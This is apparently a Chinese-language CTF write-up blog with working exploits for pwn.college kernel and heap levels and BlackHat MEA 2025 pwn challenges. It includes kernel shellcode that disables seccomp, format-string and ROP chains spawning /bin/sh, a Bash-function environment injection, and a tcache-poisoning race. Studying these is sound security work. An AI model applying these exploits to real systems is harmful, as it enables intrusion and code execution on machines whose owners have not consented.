和上题一样，但是 kASLR on 。很简单，因为 printk 作为最后一个结构体参数保存在末尾，所以可以爆破低字节。

Exploit

#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>

#define PACKED __attribute__((packed))
#define NAKED __attribute__((naked))

#define STR(x) #x
#define XSTR(x) STR(x)

#define DEVICE "/proc/pwncollege"

typedef struct {
  char buf[256];
  char func[3];
} PACKED payload_t;

int main(void) {
  int fd = open(DEVICE, O_WRONLY);
  assert(fd > 0);

  payload_t payload = {0};
  char *cmd = "/run/dojo/bin/chown 1000:1000 /flag";

  memcpy(payload.buf, cmd, strlen(cmd));

  // ffffffffb2889b30 t run_cmd
  // ffffffffb28b69a9 T printk
  payload.func[0] = 0x30;
  payload.func[1] = 0x9b;
  payload.func[2] = 0x48;

  write(fd, &payload, sizeof(payload_t));

  return 0;
}

Level 11.0

Information

Category: Pwn

Description

Exploit a kernel device utilizing a userspace binary, with a twist!

Write-up

load_flag 把 flag 加载到 fork 出来的子进程里面，并在返回 main 函数后通过 unlink("/flag"); 将 /flag 文件删除了。但是我们注意到 fork 出来的子进程并没有退出，因此可以读取子进程的内存来输出 flag.

int load_flag()
{
  int fd; // [rsp+4h] [rbp-Ch]
  sem_t *sem; // [rsp+8h] [rbp-8h]

  puts("Attempting to load the flag into memory.\n");
  sem = (sem_t *)mmap(0, 0x1000u, 3, 33, 0, 0);
  sem_init(sem, 1, 0);
  if ( !fork() )
  {
    fd = open("/flag", 0);
    if ( fd < 0 )
      exit(1);
    read(fd, &flag_23583, 0x100u);
    close(fd);
    sem_post(sem);
    while ( 1 )
      sleep(1u);
  }
  return sem_wait(sem);
}

是时候祭出我写的 axium 了，目前是根据我 pwncollege 做题遇到的需求在拓展功能，后面还会继续更新更多内容，希望能成为 kernel exploitation 界的 pwntools xD

看看这道题用上 axium 后的实战效果：

Exploit

#include "axium/log.h"
#include "axium/tubes/process.h"
#include "axium/tubes/tube.h"
#include "axium/utils/payload.h"
#include "axium/utils/proc.h"
#include <stdio.h>
#include <string.h>

#define PACKED __attribute__((packed))
#define NAKED __attribute__((naked))

#define STR(x) #x
#define XSTR(x) STR(x)

#define TIF_SECCOMP 8

NAKED void shellcode(void) {
  __asm__ volatile(
      ".intel_syntax noprefix;"
      ".global sc_start;"
      ".global sc_end;"
      "sc_start:;"
      "mov rdi, 0x3;"
      "lea rsi, [rip + break_seccomp_start];"
      "mov rdx, break_seccomp_end - break_seccomp_start;"
      "mov rax, 0x1;"
      "syscall;" // write(0x3, break_seccomp_start, sizeof(break_seccomp))
      "lea rdi, [rip + path];"
      "xor rsi, rsi;"
      "mov rax, 0x2;"
      "syscall;" // open(\"/proc/pid/mem\", 0x0)
      "mov rdi, 0x1;"
      "mov rsi, rax;"
      "push 0x404040;"
      "mov rdx, rsp;"
      "mov r10, 0x1337;"
      "mov rax, 0x28;"
      "syscall;" // sendfile(0x1, fd, 0x404040, 0x1337)
      "break_seccomp_start:;"
      "mov rax, QWORD PTR gs:0x15d00;"
      "and QWORD PTR [rax], ~(1 << " XSTR(
          TIF_SECCOMP) ");"
                       "ret;"
                       "break_seccomp_end:;"
                       "path: .ascii \"/proc/XXXXXXXXXX/mem\";"
                       "sc_end:;"
                       ".att_syntax;");
}

extern char sc_start[];
extern char sc_end[];

int main(void) {
  char *const challenge_argv[] = {"/challenge/babykernel_level11.0", NULL};
  tube *t = process_ext(challenge_argv, NULL, TUBE_STDIN);
  pid_t child_pid = t_pid(t) + 1;

  if (!wait_for_pid(child_pid, 1000)) {
    log_exception("spawn child process");
    return -1;
  }

  size_t sc_size = sc_end - sc_start;
  uint8_t sc[sc_size];
  memcpy(sc, sc_start, sc_size);

  const char *marker = "/proc/XXXXXXXXXX/mem";
  char real_path[32];
  snprintf(real_path, sizeof(real_path), "/proc/%d/mem", child_pid);

  patch(sc, sc_size, marker, strlen(marker), real_path, strlen(real_path));
  sendline(t, sc, sc_size);

  return 0;
}

Level 12.0

Information

Category: Pwn

Description

Exploit a kernel device utilizing a userspace binary, with a twist!

Write-up

这题和上题的区别在于，fork 出来的子进程读取完 flag 后直接退出了，这样一来子进程的页表映射就被销毁了，我们无法再通过 /proc/pid/mem 的方式访问到子进程的内存空间。

但销毁只是把用户态的页表映射移除，并不是说会将它使用过的物理内存空间也擦除，不然开销太大了。所以我们可以侧信道遍历内核物理地址空间找到 flag，前提是期间没有被其它运行过的程序破坏原先 flag 在内核物理地址空间的残留。

__pid_t load_flag()
{
  int fd; // [rsp+Ch] [rbp-4h]

  puts("Attempting to load the flag into memory.\n");
  if ( !fork() )
  {
    fd = open("/flag", 0);
    if ( fd < 0 )
      exit(1);
    read(fd, &flag_23549, 0x100u);
    close(fd);
    exit(0);
  }
  return wait(0);
}

Exploit

#include <axium/axium.h>

#define PAGE_OFFSET 0xffff888000000000
#define PRINTK_ADDR 0xffffffff810b69a9

/* clang-format off */
DEFINE_SHELLCODE(sc_write) {
  SHELLCODE_START(sc_write);
  __asm__ volatile(
    "mov edi, 0x3\n"
    "lea rsi, [rip + " XSTR(SC_M(uint32_t, 1)) "]\n"
    "mov edx, " XSTR(SC_M(uint32_t, 2)) "\n"
    "mov eax, 0x1\n"
    "syscall\n" // write(0x3, side_channel_start, sizeof(side_channel))
  );
  SHELLCODE_END(sc_write);
}

DEFINE_SHELLCODE(sc_side_channel) {
  SHELLCODE_START(sc_side_channel);
  __asm__ volatile(
      "mov rdi, " XSTR(PAGE_OFFSET) "\n"
      "mov rbx, [rip + mark]\n"
      "loop:\n"
      "  cmp rbx, [rdi]\n"
      "  je print\n"
      "  inc rdi\n"
      "  jmp loop\n"
      "print:\n"
      "  push rdi\n"
      "  mov rax, " XSTR(PRINTK_ADDR) "\n"
      "  call rax\n"
      "  pop rdi\n"
      "  inc rdi\n"
      "  jmp loop\n"
      "mark:\n"
      "  .ascii \"college{\"\n"
  );
  SHELLCODE_END(sc_side_channel);
}
/* clang-format on */

int main(void) {
  set_log_level(DEBUG);
  char *const challenge_argv[] = {"/challenge/babykernel_level12.0", NULL};
  tube *t = process_ext(challenge_argv, NULL, TUBE_STDIN);

  payload_t sc_side_channel;
  payload_init(&sc_side_channel);
  PAYLOAD_PUSH_SC(&sc_side_channel, sc_side_channel);

  payload_t sc_write;
  payload_init(&sc_write);
  PAYLOAD_PUSH_SC(&sc_write, sc_write);
  sc_fix_rel(&sc_write, 1, (uint32_t)sc_write.size);
  sc_fix(&sc_write, 2, (uint32_t)sc_side_channel.size);

  payload_t payload;
  payload_init(&payload);
  payload_push(&payload, sc_write.data, sc_write.size);
  payload_push(&payload, sc_side_channel.data, sc_side_channel.size);

  sendline(t, payload.data, payload.size);

  payload_fini(&sc_side_channel);
  payload_fini(&sc_write);
  payload_fini(&payload);
  t_close(t);

  return 0;
}

Write-ups: BlackHat MEA CTF Final 2025

Tue, 02 Dec 2025 00:00:00 GMT

Verifmt

Information

Category: Pwn

Description

Verifmt is a format string converter with a powerful verifier.

Write-up

题目给了源码，还是很方便的：

#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int verify_fmt(const char *fmt, size_t n_args) {
  size_t argcnt = 0;
  size_t len = strlen(fmt);

  for (size_t i = 0; i < len; i++) {
    if (fmt[i] == '%') {
      if (fmt[i+1] == '%') {
        i++;
        continue;
      }

      if (isdigit(fmt[i+1])) {
        puts("[-] Positional argument not supported");
        return 1;
      }

      if (argcnt >= n_args) {
        printf("[-] Cannot use more than %lu specifiers\n", n_args);
        return 1;
      }

      argcnt++;
    }
  }

  return 0;
}

int main() {
  size_t n_args;
  long args[4];
  char fmt[256];

  setbuf(stdin, NULL);
  setbuf(stdout, NULL);

  while (1) {
    /* Get arguments */
    printf("# of args: ");
    if (scanf("%lu", &n_args) != 1) {
      return 1;
    }

    if (n_args > 4) {
      puts("[-] Maximum of 4 arguments supported");
      continue;
    }

    memset(args, 0, sizeof(args));
    for (size_t i = 0; i < n_args; i++) {
      printf("args[%lu]: ", i);
      if (scanf("%ld", args + i) != 1) {
        return 1;
      }
    }

    /* Get format string */
    while (getchar() != '\n');
    printf("Format string: ");
    if (fgets(fmt, sizeof(fmt), stdin) == NULL) {
      return 1;
    }

    /* Verify format string */
    if (verify_fmt(fmt, n_args)) {
      continue;
    }

    /* Enjoy! */
    printf(fmt, args[0], args[1], args[2], args[3]);
  }

  return 0;
}

发现只是对格式化字符串做了一些限制，不能利用位置参数泄漏指定值，再者就是最多只能使用四个格式化字符串标志符（以 % 打头算一个），且格式化字符串格式也是固定为 printf(fmt, args[0], args[1], args[2], args[3]);，但是传入 printf 的所有参数都是可控的。

这题基本上只要搞明白怎么泄漏地址就赢了，涉及到一个 * 参数的概念，如果我们输入 %*.*p%*.*p，这四个 * 就会分别用 args[0] ~ args[3] 为参数，且 p 也各占一个参数位，此时我们只使用了两个 % 标识符，就已经消耗了六个参数，另外还剩两次机会。好巧不巧，栈上就有一个地址，正好是第七个参数，所以直接再加一个 %p 泄漏即可。

泄漏了栈地址我们就知道返回地址，调试发现返回地址处保存的正好是 libc 地址，我们可以直接控制 rsi 为返回地址，fmt 为 %s 以此泄漏 libc，之后就随便打打了。

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    context,
    flat,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")
args = parser.parse_args()


FILE = "./chall_patched"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def set_args(cnt, *args_values, fmt):
    target.sendlineafter(b"# of args: ", str(cnt).encode())

    for i, val in enumerate(args_values):
        if val is not None:
            prompt = f"args[{i}]: "
            target.sendlineafter(prompt.encode(), str(val).encode())

    # raw_input("DEBUG")
    target.sendlineafter(b"Format string: ", fmt)


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target, targets

    if args.L and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.L:
        target = process(FILE)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        targets = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
        target = targets[0]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    set_args(4, 1, 2, 3, 4, fmt=b"%*.*p%*.*p %p")

    target.recvuntil(b" ")
    stack = int(target.recvline(), 16)
    pie = stack + 0x158
    ret = stack + 0x170

    target.success(f"stack: {hex(stack)}")
    target.success(f"pie: {hex(pie)}")
    target.success(f"ret: {hex(ret)}")

    set_args(1, ret, fmt=b"%s")
    libc.address = int.from_bytes(target.recv(0x6), "little") - 0x29D90

    set_args(1, pie, fmt=b"%s")
    elf.address = int.from_bytes(target.recv(0x6), "little") - 0x1160

    target.success(f"libc: {hex(libc.address)}")
    target.success(f"pie: {hex(elf.address)}")

    pop_rdi_ret = elf.address + 0x0000000000001282
    binsh = next(libc.search(b"/bin/sh"))
    system = libc.sym["system"]
    align = elf.address + 0x000000000000101A

    set_args(3, pop_rdi_ret & 0xFFFF, 0, ret, fmt=b"%*c%hn")
    set_args(3, (pop_rdi_ret >> 16) & 0xFFFF, 0, ret + 2, fmt=b"%*c%hn")
    set_args(3, (pop_rdi_ret >> 32) & 0xFFFF, 0, ret + 4, fmt=b"%*c%hn")
    set_args(3, binsh & 0xFFFF, 0, ret + 0x8, fmt=b"%*c%hn")
    set_args(3, (binsh >> 16) & 0xFFFF, 0, ret + 0x8 + 2, fmt=b"%*c%hn")
    set_args(3, (binsh >> 32) & 0xFFFF, 0, ret + 0x8 + 4, fmt=b"%*c%hn")
    set_args(3, align & 0xFFFF, 0, ret + 0x10, fmt=b"%*c%hn")
    set_args(3, (align >> 16) & 0xFFFF, 0, ret + 0x10 + 2, fmt=b"%*c%hn")
    set_args(3, (align >> 32) & 0xFFFF, 0, ret + 0x10 + 4, fmt=b"%*c%hn")
    set_args(3, system & 0xFFFF, 0, ret + 0x18, fmt=b"%*c%hn")
    set_args(3, (system >> 16) & 0xFFFF, 0, ret + 0x18 + 2, fmt=b"%*c%hn")
    set_args(3, (system >> 32) & 0xFFFF, 0, ret + 0x18 + 4, fmt=b"%*c%hn")

    target.sendlineafter(b"# of args: ", b"A")
    target.interactive()


if __name__ == "__main__":
    main()

Stack Prelude

Information

Category: Pwn

Description

It is either easy or impossible.

Write-up

比赛期间没做出来，赛后复现的，纯纯的经验题好吧……

题目源码如下：

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

int main(int argc, char **argv) {
  struct sockaddr_in cli, addr = {0};
  socklen_t clen;
  int cfd, sfd = -1, yes = 1;
  ssize_t n;
  char buf[0x100];
  unsigned short port = argc < 2 ? 31337 : atoi(argv[1]);

  if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
    perror("socket");
    goto err;
  }

  if (setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes)) < 0) {
    perror("setsockopt(SO_REUSEADDR)");
    goto err;
  }

  addr.sin_family = AF_INET;
  addr.sin_addr.s_addr = htonl(INADDR_ANY);
  addr.sin_port = htons(port);

  if (bind(sfd, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
    perror("bind");
    goto err;
  }

  if (listen(sfd, 1) < 0) {
    perror("listen");
    goto err;
  }

  clen = sizeof(cli);
  if ((cfd = accept(sfd, (struct sockaddr*)&cli, &clen)) < 0) {
    perror("accept");
    goto err;
  }

  while (1) {
    n = 0;
    recv(cfd, &n, sizeof(ssize_t), MSG_WAITALL);
    if (n <= 0 || n >= 0x200)
      break;

    recv(cfd, buf, n, MSG_WAITALL);
    send(cfd, buf, n, 0);
  }

  return 0;

err:
  if (sfd >= 0) close(sfd);
  return 1;
}

这题是个一次只能处理一个请求的 socket 服务器，先说说我当时取得的成果吧……我是发现可以发送半闭 FIN 包使 recv 函数不接收完整的数据直接返回，由于没有检查 recv 函数的返回值，后面的 send 会泄漏栈数据。

这里提到的半闭 FIN 包可以通过 target.shutdown("write") 发送关闭输入的半闭包，保留输出，但是这么做的问题就在于，关闭了输入后在 send 结束回到 while 循环头后 recv 接收不到数据，返回 0，退出循环，结束程序。所以即使我们泄漏了数据，要是不能继续和程序交互的话也只能是干瞪眼……

草啊，其实当时是很有希望做出这道题的，但是没有想过我可以给自己发送的数据加 flags，如果能想到这点的话这题就秒了……感觉自己是猪头，我连 FIN 都想到了，就是没想到 flags，这难道不是一个很自然的想法吗？？气死我了 smh（

现场学能绕过 MSG_WAITALL 的方法，总结为如下几种情况：

对端关闭连接 (FIN)
对端异常断开 (RST)
中断信号
超时（前提是设置了 SO_RCVTIMEO flag）
其它奇奇怪怪的致命错误

FIN 可以排除了，因为发了这个后续不能继续操作，超时也可以排除，因为没设置这个 flag，我们可以重点研究一下有哪些可以由 client 端发送的 flag 会触发中断信号，这里就不赘述了，直接说结论 —— MSG_OOB，这个 flag 表示 out-of-band，如果用在 send，就代表会使用一个额外的 urgent byte，表示外带数据，接收端处理 TCP 数据包发现 urgent byte 会触发 SIGURG 信号，这个信号属于异步事件，可以打断带有 MSG_WAITALL flag 的 recv 函数。

现在我们泄漏了数据，又能维持交互，那剩下的应该没啥好说的了，只需要注意 socket server 需要让 stdin 和 stdout 指向 socket 通道就好了，不然无法和返回的 shell 交互。

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    constants,
    context,
    flat,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")
args = parser.parse_args()


FILE = "./chall_patched"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.L and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.L:
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(argv, env=envp)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch([FILE, "1337"])

    thread[0].sendline(flat(0x120))
    thread[0].sock.send(b"A" * 2, constants.MSG_OOB)

    resp = thread[0].recv(0x120)
    canary = int.from_bytes(resp[0x108:0x110], "little")
    libc.address = int.from_bytes(resp[0x118:0x120], "little") - 0x2A1CA

    thread[0].success(f"canary: {hex(canary)}")
    thread[0].success(f"libc: {hex(libc.address)}")

    raw_input("DEBUG")
    thread[0].sendline(flat(0x188))

    pop_rdi_ret = libc.address + 0x000000000010F78B
    pop_rsi_ret = libc.address + 0x0000000000110A7D
    binsh = next(libc.search(b"/bin/sh"))
    dup2 = libc.sym["dup2"]
    system = libc.sym["system"]
    align = pop_rdi_ret + 1
    payload = flat(
        {
            0x108 - 1: canary,
            0x118 - 1: pop_rdi_ret,
            0x120 - 1: 4,
            0x128 - 1: pop_rsi_ret,
            0x130 - 1: 0,
            0x138 - 1: dup2,
            0x140 - 1: pop_rdi_ret,
            0x148 - 1: 4,
            0x150 - 1: pop_rsi_ret,
            0x158 - 1: 1,
            0x160 - 1: dup2,
            0x168 - 1: align,
            0x170 - 1: pop_rdi_ret,
            0x178 - 1: binsh,
            0x180 - 1: system,
        },
        filler=b"\x00",
    )
    raw_input("DEBUG")
    thread[0].sendline(payload)

    thread[0].sendline(flat(0x200))

    thread[0].interactive()


if __name__ == "__main__":
    main()

Stack Impromptu

Information

Category: Pwn

Description

The word impossible is not in my dictionary.

Write-up

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <pthread.h>

void fatal(const char *msg) {
  perror(msg);
  pthread_exit(NULL);
}

int server_read(int& fd) {
  size_t size;
  char buf[0x40];

  memset(buf, 0, sizeof(buf));
  if (read(fd, &size, sizeof(size)) != sizeof(size)
      || size > 0x100
      || read(fd, buf, size) < size)
    goto err;

  write(fd, buf, size);
  return 0;

err:
  close(fd);
  fatal("Could not receive data (read)");
  return 1;
}

void* server_main(void* arg) {
  int fd = (int)((intptr_t)arg);
  while (server_read(fd) == 0);
  return NULL;
}

int main(int argc, char** argv) {
  pthread_t th;
  struct sockaddr_in cli, addr = { 0 };
  socklen_t clen;
  int cfd, sfd = -1, yes = 1;
  unsigned short port = argc < 2 ? 31337 : atoi(argv[1]);

  if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
    perror("socket");
    goto err;
  }

  if (setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes)) < 0) {
    perror("setsockopt(SO_REUSEADDR)");
    goto err;
  }

  addr.sin_family = AF_INET;
  addr.sin_addr.s_addr = htonl(INADDR_ANY);
  addr.sin_port = htons(port);

  if (bind(sfd, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
    perror("bind");
    goto err;
  }

  if (listen(sfd, 5) < 0) {
    perror("listen");
    goto err;
  }

  while (1) {
    clen = sizeof(cli);
    if ((cfd = accept(sfd, (struct sockaddr*)&cli, &clen)) < 0) {
      perror("accept");
      goto err;
    }

    pthread_create(&th, NULL, server_main, (void*)((intptr_t)cfd));
    pthread_detach(th);
  }

  return 0;

err:
  if (sfd >= 0) close(sfd);
  return 1;
}

待复现。

Exploit

Stack Rhapsody

Information

Category: Pwn

Description

Unknown

Write-up

// gcc -Wall -Wextra -fstack-protector-all -fcf-protection=full -mshstk -fPIE -pie -Wl,-z,relro,-z,now chall.c -o chall

#include <stdio.h>
#include <stdlib.h>

int main() {
  char buf[0x10000];
  fgets(buf, 0x100000, stdin);
  system("echo Are you a good pwner?");
  return 0;
}

看似不可能的挑战，真的，不可能吗？Shellshock

有时间我会单独写一篇博客详撕源码，这里就只留 exp 了/逃

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    context,
    flat,
    process,
    raw_input,
    remote,
)
from pwnlib.util.iters import pad

parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")
args = parser.parse_args()


FILE = "./chall"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.L and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.L:
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    env = b"BASH_FUNC_echo%%=() { /bin/sh; }\0".ljust(0x30, b"\x00")
    payload = (b"A" * 0xA + env * ((0x10148 - 0xA) // len(env))).ljust(0x10148, b"\x00")

    target.sendline(payload)
    target.recvuntil(b"Are you a good pwner?", timeout=0.5)
    target.interactive()


if __name__ == "__main__":
    main()

Scream

Information

Category: Pwn

Description

Keep the secret.

Write-up

待复现。

Exploit

EDU

Information

Category: Pwn

Description

QEMU provides an educational device for learning VM escape. This bug is intentionally made for educational purpose, right? …… Right?

https://www.qemu.org/docs/master/specs/edu.html

Write-up

待复现。

Exploit

Write-ups: Software Exploitation (Exploitation Primitives) series (Completed)

Fri, 21 Nov 2025 00:00:00 GMT

前言

盲猜这章是 FSOP 综合利用，但是看到第一题就傻眼了。预知后事如何，请看 wp（

Level 1

Information

Category: Pwn

Description

Create and use arbitrary read primitives to read from the .bss.

Write-up

本来以为这章顶多就是 Heap + FSOP 综合利用，但是没想到是 Race Conditions + Heap + FSOP……没怎么做过 Race Condition 的我直接人傻了（

但是我又不想为此先去把 Race Conditions 那章做完，那咋办？忍了呗……相信自己的学习能力<s>/自信</s>

~~敲黑板，像这样详细的 wp 我大概只会写这一次，后面的题就简单说思路，不细写了。~~

首先是下面这个好像很熟悉实则不然的多线程服务器，不讲了（

不记得的去看我的笔记复习吧～~~其实我一开始也忘差不多了（bushi~~

直接跟进到核心函数：

int challenge()
{
  int result; // eax
  const char *v1; // rax
  int v2; // ebx
  char *s1_1; // rax
  int v4; // [rsp+2Ch] [rbp-424h] BYREF
  char s1[1032]; // [rsp+30h] [rbp-420h] BYREF
  unsigned __int64 v6; // [rsp+438h] [rbp-18h]

  v6 = __readfsqword(0x28u);
  fwrite("Welcome to the message server!\n", 1u, 0x1Fu, (FILE *)__readfsqword(0xFFFFFFF8));
  fwrite("Commands: malloc/free/scanf/printf/send_flag/quit.\n", 1u, 0x33u, (FILE *)__readfsqword(0xFFFFFFF8));
  while ( 1 )
  {
    result = __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%1024s", s1);
    if ( result == -1 )
      break;
    if ( !strcmp(s1, "printf") )
    {
      result = __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%d", &v4);
      if ( result == -1 )
        return result;
      v1 = stored[v4] ? (const char *)*((_QWORD *)&messages + v4) : "NONE";
      result = fprintf((FILE *)__readfsqword(0xFFFFFFF8), "MESSAGE: %s\n", v1);
      if ( result < 0 )
        return result;
    }
    else if ( !strcmp(s1, "malloc") )
    {
      result = __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%d", &v4);
      if ( result == -1 )
        return result;
      if ( !stored[v4] )
      {
        v2 = v4;
        *((_QWORD *)&messages + v2) = malloc(0x400u);
      }
      stored[v4] = 1;
    }
    else if ( !strcmp(s1, "scanf") )
    {
      result = __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%d", &v4);
      if ( result == -1 )
        return result;
      if ( stored[v4] )
        s1_1 = (char *)*((_QWORD *)&messages + v4);
      else
        s1_1 = s1;
      __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%1024s", s1_1);
    }
    else if ( !strcmp(s1, "free") )
    {
      result = __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%d", &v4);
      if ( result == -1 )
        return result;
      if ( stored[v4] )
        free(*((void **)&messages + v4));
      stored[v4] = 0;
    }
    else if ( !strcmp(s1, "send_flag") )
    {
      fwrite("Secret: ", 1u, 8u, (FILE *)__readfsqword(0xFFFFFFF8));
      __isoc99_fscanf(__readfsqword(0xFFFFFFF0), "%1024s", s1);
      if ( (unsigned __int8)secret_correct(s1) )
      {
        fwrite("Authorized!\n", 1u, 0xCu, (FILE *)__readfsqword(0xFFFFFFF8));
        win();
      }
      else
      {
        fwrite("Not authorized!\n", 1u, 0x10u, (FILE *)__readfsqword(0xFFFFFFF8));
      }
    }
    else
    {
      result = strcmp(s1, "quit");
      if ( !result )
        return result;
      fwrite("Unrecognized choice!\n", 1u, 0x15u, (FILE *)__readfsqword(0xFFFFFFF8));
    }
  }
  return result;
}

咋一看还挺安全，没有溢出，没有 UAF，好像无懈可击的鸭子。

~~内心 OS: wth 第一题就这样恶心我！？那还学个屁，埋了吧（~~

好吧，稍微用心想想的话，其实还是有很大的问题的……注意，这是一个多线程服务器，允许我们创建无限的连接进行交互，但是程序在操作 stored 全局数组的时候操作并不是 atomic 的，也没有为其加锁，那那那，na 这不就存在一个潜在的 race condition 吗？并且在这种情况下可以归类为 Time-of-Check to Time-of-Use (TOCTOU) 型的条件竞争，因为在每次操作前都检查了 stored 数组然后才执行操作，检查和实际 action 之间有一个 tiny gap 可以被利用。最后，又因为 tcache 不检查 chunk metadata，所以接下来打一个 tcache poisoning 就可以任意读了。

其实我也不是完全不懂 race condition 的 xD，同样，忘记的可以看我笔记。

~~OK, 讲完了/逃 bro 现在凌晨三点，实在是不想写了，各位师傅还是直接看 exp 吧去感悟吧，反正像这种菜鸟题也没人看（~~

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    context,
    flat,
    os,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")
args = parser.parse_args()


FILE = "/challenge/babyprime_level1.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def printf(tid, idx):
    thread[tid].sendline(f"printf {idx}".encode())


def malloc(tid, idx):
    thread[tid].sendline(f"malloc {idx}".encode())


def scanf(tid, idx, content):
    thread[tid].sendline(f"scanf {idx} {content}".encode())


def free(tid, idx):
    thread[tid].sendline(f"free {idx}".encode())


def send_flag(tid, secret):
    thread[tid].sendline(b"send_flag")
    thread[tid].sendlineafter(b"Secret: ", secret)


def quit(tid):
    thread[tid].sendline(b"quit")


def arbitrary_read(addr):
    while True:
        thread[0].send((b"malloc 0 free 0\n") * 10000)
        if os.fork() == 0:
            thread[1].send((b"scanf 0" + flat(addr) + b"\n") * 10000)
            os.kill(os.getpid(), 9)
        os.wait()

        malloc(0, 0)
        printf(0, 0)
        thread[0].recvuntil(b"MESSAGE: ")
        poisoned = int.from_bytes(thread[0].recvline().strip(), "little")

        if flat(poisoned) == flat(addr):
            break

    malloc(0, 1)
    printf(0, 1)

    thread[0].recvuntil(b"MESSAGE: ")
    return thread[0].recvline().strip()


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target, thread

    if args.L and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.L:
        target = process(FILE)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)
    malloc(0, 0)
    malloc(0, 1)

    printf(0, 0)
    thread[0].recvuntil(b"MESSAGE: ")
    heap = int.from_bytes(thread[0].recvline().strip(), "little")

    printf(0, 1)
    thread[0].recvuntil(b"MESSAGE: ")
    pos = int.from_bytes(thread[0].recvline().strip(), "little")
    heap = demangle(heap, pos)

    thread[0].success(f"pos: {hex(pos)}")
    thread[0].success(f"heap: {hex(heap)}")

    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)

    raw_input("DEBUG")
    secret = 0x4054C0
    secret = arbitrary_read(mangle(pos - 1, secret))

    send_flag(0, secret)
    quit(0)
    quit(1)

    thread[0].interactive()


if __name__ == "__main__":
    main()

Level 2

Information

Category: Pwn

Description

Create and use arbitrary read primitives to read from a thread's heap.

Write-up

太简单不讲。

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    context,
    flat,
    os,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")
args = parser.parse_args()


FILE = "/challenge/babyprime_level2.0"
